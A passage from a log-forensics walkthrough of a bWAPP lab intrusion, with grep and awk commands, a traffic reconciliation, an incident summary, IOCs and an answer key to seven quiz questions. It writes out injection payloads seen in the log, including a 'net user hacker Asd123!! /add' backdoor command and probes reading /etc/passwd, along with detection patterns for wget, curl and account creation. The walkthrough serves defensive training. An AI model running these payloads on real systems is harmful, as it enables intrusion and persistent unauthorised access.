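# Re-encoding while leaving "!" and "/" alone mirrors what the log recorded.
as_logged = quote(decoded, safe="!/")

# Encoding every reserved character produces a different string for the same command.
fully_encoded = quote(decoded, safe="")

print(as_logged == raw)
print(fully_encoded)
```

A search for the fully encoded variant would miss the lines in this log, which is why the evidence record should carry the string exactly as the server wrote it.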

Q7 ANSWER: Yes — persistence was established.
Related payload: %27net%20user%20hacker%20Asd123!!%20/add%27


PHASE 9 — FINAL VERIFICATION AND CLOSURE

Confirm all attacker traffic is accounted for before closing the investigation


STEP 25 — Verify total traffic attribution

Why: Before declaring an investigation complete, a SOC analyst must confirm that every request from the attacker IP has been categorised into a known phase. Unaccounted traffic is a red flag — it may represent an additional attack vector, a tool phase you missed, or a second attacker entirely. The investigation cannot be closed until the arithmetic balances to zero remainder.

The correct method for this log:

The three confirmed tool phases were identified by their User-Agent strings. The cleanest way to surface unaccounted traffic is therefore to subtract those three populations from the total using chained grep -v (invert match) commands. This approach searches the entire raw line — not just a parsed field — which means it is immune to the field-misalignment problem that affects awk -F'"' on structurally malformed lines.

# Step 1 — Establish the total attacker request count
grep "192.168.199.2" access.log | wc -l

# Step 2 — Count each confirmed phase
grep "Nikto"       attacker_traffic.log | wc -l
grep "MSIE 6.0"    attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l

# Step 3 — Isolate exactly what remains: lines that match NONE of the three known tools
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0" \
  | wc -l

# Step 4 — Identify the User-Agents of the remaining lines
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0" \
  | awk -F'"' '{print $6}' | sort | uniq -c | sort -rn

# Step 5 — Inspect all 83 raw lines to confirm their content and phase
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0"

# Step 6 — Confirm the investigation closes cleanly at the last known event
grep "192.168.199.2" access.log | tail -5

This log — confirmed terminal results:

Step 1 — Total:
  12528

Step 2 — Phase counts:
  7455   Nikto
  4816   MSIE 6.0
   174   Firefox/52.0

Step 3 — Unaccounted count:
  83

Step 4 — User-Agent breakdown of the 83 lines:
  74   -           (null UA — no User-Agent header sent at all)
   5   ./.\\\      (Nikto path traversal evasion — UA set to a traversal string)
   4               (empty string UA — blank UA header sent)
  --
  83   total ✓

Step 5 — Raw line content of the 83 (representative sample):
  12:36:24  GET /bwapp/4RaXX5Ac.xml                         400  (Nikto extension probe)
  12:36:33  GET /bwapp/site/' UNION                         400  (SQL injection test)
  12:36:33  GET /bwapp/postnuke/...XSS payload...           400  (XSS injection test)
  12:36:34  GET /bwapp/index.php?action=search&...XSS...    400  (XSS injection test)
  12:36:34  GET /bwapp/cgi-bin/handler/...cat /etc/passwd   400  (OS command injection test)
  12:36:39  GET /bwapp/forum.asp?n=../../boot.ini|...SQL... 400  (Path traversal + SQLi test)
  12:36:46  GET /bwapp/...?mfh_root_path=http://cirt.net/.. 400  (RFI probe)
  12:36:54  <script>alert(1)</script> /bwapp/ HTTP/1.1      400  (XSS injected into method field)
  12:36:56  GET /bwapp/MediaServerDevDesc.xml               400  (Service discovery probe)
  (... 74 additional lines, all within the 12:36:24–12:36:57 Phase 1 window)

Step 6 — Final 5 lines in the log:
  12:52:36  GET /bWAPP/phpi.php?message=...whoami...        200  Firefox/52.0
  12:52:46  GET /bWAPP/phpi.php?message=...net user...      200  Firefox/52.0
  12:52:56  GET /bWAPP/phpi.php?message=...net share...     200  Firefox/52.0
  12:53:13  GET /bWAPP/phpi.php?message=...hacker.../add    200  Firefox/52.0
  12:53:23  GET /bWAPP/phpi.php?message=...hacker.../add    200  Firefox/52.0

Analysis of the 83 unaccounted lines:

All 83 lines fall within the Phase 1 time window (12:36:24–12:36:57) and contain Nikto’s characteristic probe patterns: random extension strings, cirt.net/rfiinc.txt RFI payloads, path traversal sequences, XSS test strings, and SQL injection fragments. They are Phase 1 Nikto requests that were logged without the standard Nikto User-Agent string.

Why grep "Nikto" missed them: none of these 83 lines carries the literal string “Nikto” in its User-Agent field, so the Phase 1 count (grep "Nikto" | wc -l) never included them. Either Nikto omitted or replaced its standard UA for these tests, or the server rejected the malformed request (every one of them returned 400) and logged no usable UA. In both cases the lines belong to Phase 1, and the subtraction in Step 3 is what surfaces them.

Why awk -F'"' works correctly on these 83 lines: The structurally malformed lines identified in Step 2B all contain the Nikto attack payload text and therefore all contain the string “Nikto” — they are filtered out by grep -v "Nikto" before awk -F'"' ever sees them. The 83 lines that reach awk are all well-formed log entries (all returned 400 326), so the quote-delimited field extraction produces clean, accurate results: 74 -, 5 ./.\\\, 4 (empty).

UA breakdown explained:

User-Agent                 Count  What it means
- (null)                   74     Nikto sent these requests with no UA header at all, so the server logs a literal - in the UA position. Nikto uses this to test whether the target blocks scanner UAs.
./.\\\ (traversal string)  5      Nikto set its UA to a path traversal string (./.\\\) to test whether the server or WAF treats the UA field as an injection point.
(empty string)             4      Nikto sent a blank UA string. Functionally similar to null but technically distinct: an empty string vs an absent header.

Final arithmetic — complete traffic reconciliation:

Phase 1  Nikto (standard UA lines)   7,455
Phase 1  Nikto (evasion UA lines)       83   ← surfaced by this step
Phase 2  Dirb                         4,816
Phase 3  Firefox/52.0 (brute force)     174  (includes Phase 4 injection)
                                     ------
Total                                12,528  ✓

Cross-check A:  12,445 (grep subtotal) + 83 (evasion) = 12,528  ✓
Cross-check B:   7,455 + 83 + 4,816 + 174            = 12,528  ✓

All 12,528 attacker requests are fully attributed. The unaccounted remainder is zero. The last five entries in the log are the final Phase 4 injection payloads — the investigation closes at the exact moment the attacker executed their persistence command for the second time at 12:53:23. No post-persistence activity, no cleanup, no additional phases. Investigation is complete.
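The reconciliation arithmetic is easy to script so it can be rerun whenever a bucket changes. A minimal sketch using the counts above; unattributed is a hypothetical helper name and the bucket labels are my own.

```python
def unattributed(total, buckets):
    """Requests left over after subtracting every attributed bucket."""
    return total - sum(buckets.values())


TOTAL = 12528  # all requests from 192.168.199.2

buckets = {
    "Nikto (standard UA)": 7455,
    "Nikto (no or altered UA)": 83,
    "Dirb (MSIE 6.0 UA)": 4816,
    "Firefox/52.0 (manual phases)": 174,
}

remainder = unattributed(TOTAL, buckets)
print(f"Attributed: {sum(buckets.values())}  Unattributed: {remainder}")
```

Any non-zero remainder means at least one request has not been assigned to a phase and the investigation should stay open.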


STEP 26 — Complete incident summary

INCIDENT SUMMARY
================
Log File:         access.log
Attacker IP:      192.168.199.2
Target IP/App:    192.168.199.5 / bWAPP (buggy web application)
Total Requests:   12,528 (99.77% of all traffic in the log)
Incident Window:  20/Jun/2021  12:36:24 → 12:53:23  (16 min 59 sec)

ATTACK PHASE SEQUENCE:

Phase 1 — Web Reconnaissance                              [Q1: nikto]
  Tool:       Nikto v2.1.6
  UA:         Mozilla/5.00 (Nikto/2.1.6) (Evasions:None)
  Timeframe:  12:36:24 → 12:36:57  (33 seconds)
  Volume:     7,455 requests
  Activity:   Automated scan for CVEs, dangerous files, misconfigurations
              Shellshock probe (CVE-2014-6271), extension enumeration
  Findings:   bWAPP application on /bWAPP/, login page at /bWAPP/login.php

Phase 2 — Directory Listing Discovery                     [Q2: directory brute force]
  Technique:  Directory Brute Force
  Tool:       Dirb
  UA:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  Note:       UA confirmed as Dirb's known default; behavior-verified
  Timeframe:  12:37:50 → 12:38:02  (~12 seconds)
  Volume:     4,816 requests
  Activity:   Wordlist-based directory and file enumeration
  Result:     Predominantly 404 — mapped accessible paths

[ATTACKER GAP: 3 min 32 sec — reviewing results, selecting next tool]

Phase 3 — Third Attack                                    [Q3: Brute force | Q4: Yes]
  Technique:  Brute Force (Login Credential Brute Force)
  UA:         Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  Timeframe:  12:41:34 → 12:49:35  (~8 minutes)
  Volume:     134 POST requests to /bWAPP/login.php
  Failures:   132 × HTTP 200, body 4086 bytes (identical failed-login page)
  Success:    2 × HTTP 302 (redirect = valid credentials found)
  Breach:     First successful login: 12:49:35
  Result:     Authenticated access to bWAPP portal confirmed at 12:50:10

Phase 4 — Fourth Attack                                   [Q5: Code Injection | Q6: whoami]
  Technique:  PHP Code Injection / OS Command Injection
  Endpoint:   /bWAPP/phpi.php?message=
  Timeframe:  12:50:15 → 12:53:23  (~3 minutes)
  Volume:     8 requests to phpi.php (1 baseline, 2 test, 5 live payloads)

  Payload sequence:
    12:50:17  message=test                              (parameter probe — benign)
    12:51:37  message=test                              (probe repeated — confirmed working)
    12:52:36  system('whoami')          → Q6 ANSWER     (identify OS user)
    12:52:46  system('net user')                        (enumerate local accounts)
    12:52:56  system('net share')                       (enumerate network shares)
    12:53:13  system('net user hacker Asd123!! /add')  → Q7 ANSWER (PERSISTENCE)
    12:53:23  system('net user hacker Asd123!! /add')   (repeated for confirmation)

  All payloads: HTTP 200 with varying body sizes, consistent with server-side execution

Persistence:                                              [Q7: Yes]
  Method:     Windows local user account creation via net user /add
  Account:    Username: hacker | Password: Asd123!!
  Payload:    %27net%20user%20hacker%20Asd123!!%20/add%27
  Executed:   12:53:13 (confirmed again at 12:53:23)
  Impact:     Backdoor account survives patching, reboots, and session expiry
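The durations quoted in the summary can be recomputed from their start and end timestamps before the report is filed. This is a small sketch with hypothetical helper names (span_seconds, pretty); it assumes all events fall on the same day, which holds for this log.

```python
from datetime import datetime


def span_seconds(start, end, fmt="%H:%M:%S"):
    """Whole seconds between two same-day HH:MM:SS timestamps."""
    delta = datetime.strptime(end, fmt) - datetime.strptime(start, fmt)
    return int(delta.total_seconds())


def pretty(seconds):
    """Format a second count as 'M min S sec'."""
    minutes, secs = divmod(seconds, 60)
    return f"{minutes} min {secs} sec"


# Start and end times as listed in the incident summary.
windows = {
    "Incident window": ("12:36:24", "12:53:23"),
    "Phase 1": ("12:36:24", "12:36:57"),
    "Phase 2": ("12:37:50", "12:38:02"),
    "Gap before Phase 3": ("12:38:02", "12:41:34"),
    "Phase 3": ("12:41:34", "12:49:35"),
    "Phase 4": ("12:50:15", "12:53:23"),
}
for label, (start, end) in windows.items():
    print(f"{label}: {pretty(span_seconds(start, end))}")
```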

STEP 27 — Indicators of Compromise (IOCs)

Document these IOCs and submit them to your threat intelligence platform and detection engineering team immediately upon investigation closure.

INDICATORS OF COMPROMISE
=========================

Network IOCs:
  Attacker IP:    192.168.199.2
  Target IP:      192.168.199.5
  Protocol:       HTTP (port 80)
  Incident Date:  20 Jun 2021

Tool Signatures (User-Agent IOCs):
  Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:*)
  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)   [Dirb default UA]
  Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Endpoint IOCs:
  /bWAPP/phpi.php                       [Exploited PHP Injection page]
  /bWAPP/login.php                      [Brute-forced login page]

Payload IOCs (URL-encoded):
  %22%22;%20system(%27whoami%27)
  %22%22;%20system(%27net%20user%27)
  %22%22;%20system(%27net%20share%27)
  %22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)

Host IOCs (victim system — Windows):
  New local user account:   hacker
  Account password:         Asd123!!
  Creation method:          net user hacker Asd123!! /add
  Potential access vectors: RDP (TCP/3389), SMB (TCP/445), local Windows auth (subject to service exposure and group membership)

Recommended detections to create:
  1. Alert on any User-Agent matching Nikto/2.x.x pattern
  2. Alert on MSIE 6.0 UA string (Internet Explorer 6 lost vendor support in 2014; legitimate traffic is highly unlikely)
  3. Alert on >50 POST requests to the same login endpoint within 5 minutes from one IP
  4. Alert on HTTP 302 following a sequence of 200s on a login endpoint
  5. Alert on URL parameters containing system(, exec(, passthru(, shell_exec(
  6. Alert on net(%20|\+| )user.*(%2F|/)add in web server logs (case-insensitive; covers encoded and decoded forms)
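
Detections 1, 2, 5, and 6 above are pattern matches, so they can be prototyped before being ported to a SIEM. The sketch below is one possible shape, assuming the request URL and User-Agent have already been extracted from each log line. The rule names, the match_rules function, and the exact regular expressions are illustrative assumptions rather than a vetted rule set.

```python
import re
from urllib.parse import unquote_plus

# User-Agent rules (detections 1 and 2); rule names are hypothetical
UA_RULES = {
    "nikto_ua": re.compile(r"Nikto/2\.\d+\.\d+"),
    "msie6_ua": re.compile(r"MSIE 6\.0"),
}

# URL rules (detections 5 and 6), applied to the URL-decoded request
URL_RULES = {
    "php_exec_call": re.compile(
        r"\b(?:system|exec|passthru|shell_exec)\s*\(", re.IGNORECASE
    ),
    "net_user_add": re.compile(r"net\s+user\b.*/add", re.IGNORECASE),
}


def match_rules(url, user_agent):
    """Return the names of all rules that fire for one request."""
    # Decode first so encoded (%20, %2F, +) and plain forms match one pattern
    decoded = unquote_plus(url)
    hits = [name for name, rx in UA_RULES.items() if rx.search(user_agent)]
    hits += [name for name, rx in URL_RULES.items() if rx.search(decoded)]
    return hits


persistence_url = (
    "/bWAPP/phpi.php?message="
    "%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)"
)
firefox_ua = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
print(match_rules(persistence_url, firefox_ua))
```

Decoding before matching is a deliberate choice here: it avoids maintaining separate encoded and decoded variants of each pattern. Detections 3 and 4 depend on request sequences over time and would need stateful logic that this sketch does not cover.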

FINAL ANSWERS — ALL 7 QUESTIONS

#   Question                                                                Answer
Q1  Which automated scan tool did the attacker use for web reconnaissance?  nikto
Q2  Which technique did the attacker use for directory listing discovery?   directory brute force
Q3  What is the third attack type after directory listing discovery?        Brute force
Q4  Is the third attack successful?                                         Yes
Q5  What is the name of the fourth attack?                                  Code Injection
Q6  What is the first payload for the fourth attack?                        whoami
Q7  Is there any persistency clue? If yes, what is the related payload?     Yes: %27net%20user%20hacker%20Asd123!!%20/add%27

COMPLETE KILL CHAIN

12:36:24  PHASE 1 ─── Web Reconnaissance (Nikto v2.1.6)             [Q1: nikto]
          │   7,455 requests in 33 seconds
          │   Scanned CVEs, file extensions, shellshock, misconfigurations
          │   Located bWAPP application and login page structure
          ▼
12:37:50  PHASE 2 ─── Directory Brute Force (Dirb)                  [Q2: directory brute force]
          │   4,816 requests in ~12 seconds
          │   Enumerated directory structure via wordlist
          │   Mapped accessible paths on the target application
          ▼
          [3 min 32 sec — attacker reviewing results, setting up next tool]
          ▼
12:41:34  PHASE 3 ─── Brute Force Attack (Login)                    [Q3: Brute force]
          │   134 POST requests to /bWAPP/login.php over ~8 minutes
          │   132 failures: HTTP 200, body 4086 bytes (identical fail page)
          │   2 successes: HTTP 302 at 12:49:35                      [Q4: Yes]
          │   portal.php loaded with HTTP 200 at 12:50:10
          ▼
12:50:15  PHASE 4 ─── Code Injection (PHP + OS Command)             [Q5: Code Injection]
          │   Navigated to phpi.php (PHP Injection vulnerable page)
          │   Tested parameter with benign input — confirmed injectable
          │   12:52:36 → system('whoami')                            [Q6: whoami]
          │   12:52:46 → system('net user')
          │   12:52:56 → system('net share')
          │   12:53:13 → system('net user hacker Asd123!! /add')     [Q7: Yes]
          │   12:53:23 → system('net user hacker Asd123!! /add')     (confirmed)
          └── Backdoor account "hacker / Asd123!!" created on victim machine
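
The timing figures in the kill chain can be cross-checked with simple arithmetic. The sketch below uses only the timestamps and counts stated above; the "~12 seconds" Dirb duration is the chain's own approximation, so the derived gap is approximate too. The helper name t is an illustrative assumption.

```python
from datetime import datetime, timedelta

FMT = "%H:%M:%S"


def t(value):
    """Parse an HH:MM:SS string from the kill chain into a datetime."""
    return datetime.strptime(value, FMT)


# Phase 2 started at 12:37:50 and ran for roughly 12 seconds
dirb_end = t("12:37:50") + timedelta(seconds=12)

# Idle gap between the end of Dirb and the first brute-force POST
gap = t("12:41:34") - dirb_end

# Brute-force window: first POST to first HTTP 302
brute = t("12:49:35") - t("12:41:34")

# Average login attempts per minute across that window (134 POSTs)
rate = 134 / (brute.total_seconds() / 60)

print("gap before Phase 3:", gap)
print("brute-force duration:", brute)
print("attempts per minute:", round(rate, 1))
```

An average of under 20 attempts per minute is slow for an automated tool, which is worth keeping in mind when tuning rate-based thresholds: roughly 84 requests per 5 minutes would trip a 50-request threshold, but not by a wide margin.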

QUICK REFERENCE — ALL COMMANDS IN SEQUENCE

# ─── PHASE 1: SCOPE ──────────────────────────────────────────────────────────
wc -l access.log
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'

# Step 2A — format verification
head -3 access.log
head -1 access.log | awk '{print NF}'

# Step 2B — log integrity check (Part A: compliance count)
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log

# Step 2B — log integrity check (Part B: isolate malformed lines)
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l

# ─── PHASE 2: IDENTIFY ATTACKER ──────────────────────────────────────────────
awk '{print $1}' access.log | sort | uniq -c | sort -rn
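# Anchor on the client IP field so 192.168.199.20-29 and 192.168.199.2xx are not matched
grep '^192\.168\.199\.2 ' access.log | head -20
grep '^192\.168\.199\.2 ' access.log | tail -20
grep '^192\.168\.199\.2 ' access.log > attacker_traffic.log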
wc -l attacker_traffic.log

# ─── PHASE 3: FINGERPRINT TOOLS — Q1, Q2 ─────────────────────────────────────
# Full UA inventory — all IPs, unfiltered, verbose Nikto output expected
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation — Nikto variants collapsed, clean triage view
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Attacker-only UA detail (run after attacker_traffic.log is created)
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn
grep "Nikto"    attacker_traffic.log | wc -l
grep "Nikto"    attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto"    attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -20
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30

# ─── PHASE 4: TIMELINE ────────────────────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4}'

# ─── PHASE 5: PROFILE PHASE 3 — Q3 ───────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log
wc -l phase3_traffic.log
awk '{print $6}' phase3_traffic.log | sort | uniq -c
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15

# ─── PHASE 6: CONFIRM SUCCESS — Q4 ───────────────────────────────────────────
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l
grep "Firefox/52.0" attacker_traffic.log | grep -A5 'POST /bWAPP/login\.php[^"]*" 302 '
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"

# ─── PHASE 7: FOURTH ATTACK — Q5, Q6 ────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'

# Decode all payloads with full context
grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "import sys,urllib.parse;
for line in sys.stdin:
    p=line.strip().split()
    print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"

# ─── PHASE 8: PERSISTENCE — Q7 ───────────────────────────────────────────────
# PRIMARY: URL-encoded search for Windows account creation
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
grep "net%20user%20hacker" attacker_traffic.log

# SECONDARY: decode everything first, then search decoded output
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log
grep -i "net user.*add\|useradd\|adduser"   decoded_payloads.log
grep -i "localgroup\|sudo\|administrators"  decoded_payloads.log
grep -i "echo.*php\|wget\|curl"             decoded_payloads.log
grep -i "schtasks\|crontab"                 decoded_payloads.log
grep -i "reg add\|HKLM\|HKCU"              decoded_payloads.log

# Confirm execution (HTTP 200 = processed by server)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'

# Decode persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC

# ─── PHASE 9: VERIFY & CLOSE ──────────────────────────────────────────────────
grep "Nikto"        attacker_traffic.log | wc -l
grep "MSIE 6.0"     attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0" | wc -l
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0" \
  | awk -F'"' '{print $6}' | sort | uniq -c | sort -rn
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0"
grep '^192\.168\.199\.2 ' access.log | tail -5
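
The Phase 9 verification above (every attacker request should belong to one of the three tool signatures) can be expressed as a single pass over the log. This is a minimal sketch, assuming combined log format with the User-Agent as the last quoted field and lines in chronological order. The labels, the summarize function, the "+0000" timezone, and the sample lines are illustrative assumptions, not real log data.

```python
import re

# Capture the bracketed timestamp and the final quoted field (User-Agent)
UA_RE = re.compile(r'\[(?P<ts>[^\]]+)\].*"(?P<ua>[^"]*)"\s*$')

# (label, substring) pairs mirroring the grep patterns used above
SIGNATURES = [
    ("nikto", "Nikto"),
    ("dirb", "MSIE 6.0"),
    ("browser", "Firefox/52.0"),
]


def summarize(lines):
    """Group requests by tool signature with count and first/last timestamp."""
    summary = {}
    for line in lines:
        m = UA_RE.search(line)
        if not m:
            continue
        label = next(
            (name for name, needle in SIGNATURES if needle in m["ua"]),
            "unclassified",
        )
        entry = summary.setdefault(
            label, {"count": 0, "first": m["ts"], "last": m["ts"]}
        )
        entry["count"] += 1
        entry["last"] = m["ts"]
    return summary


# Hypothetical sample lines (shaped like the lab's entries)
sample = [
    '192.168.199.2 - - [20/Jun/2021:12:36:24 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:*)"',
    '192.168.199.2 - - [20/Jun/2021:12:37:50 +0000] "GET /admin HTTP/1.1" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.168.199.2 - - [20/Jun/2021:12:41:34 +0000] "POST /bWAPP/login.php HTTP/1.1" 200 4086 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"',
    '192.168.199.2 - - [20/Jun/2021:12:49:35 +0000] "POST /bWAPP/login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"',
]
result = summarize(sample)
for label, entry in result.items():
    print(label, entry)
```

An "unclassified" key in the result would correspond to a non-zero count from the final grep -v chain and would indicate attacker traffic that has not yet been attributed to a phase.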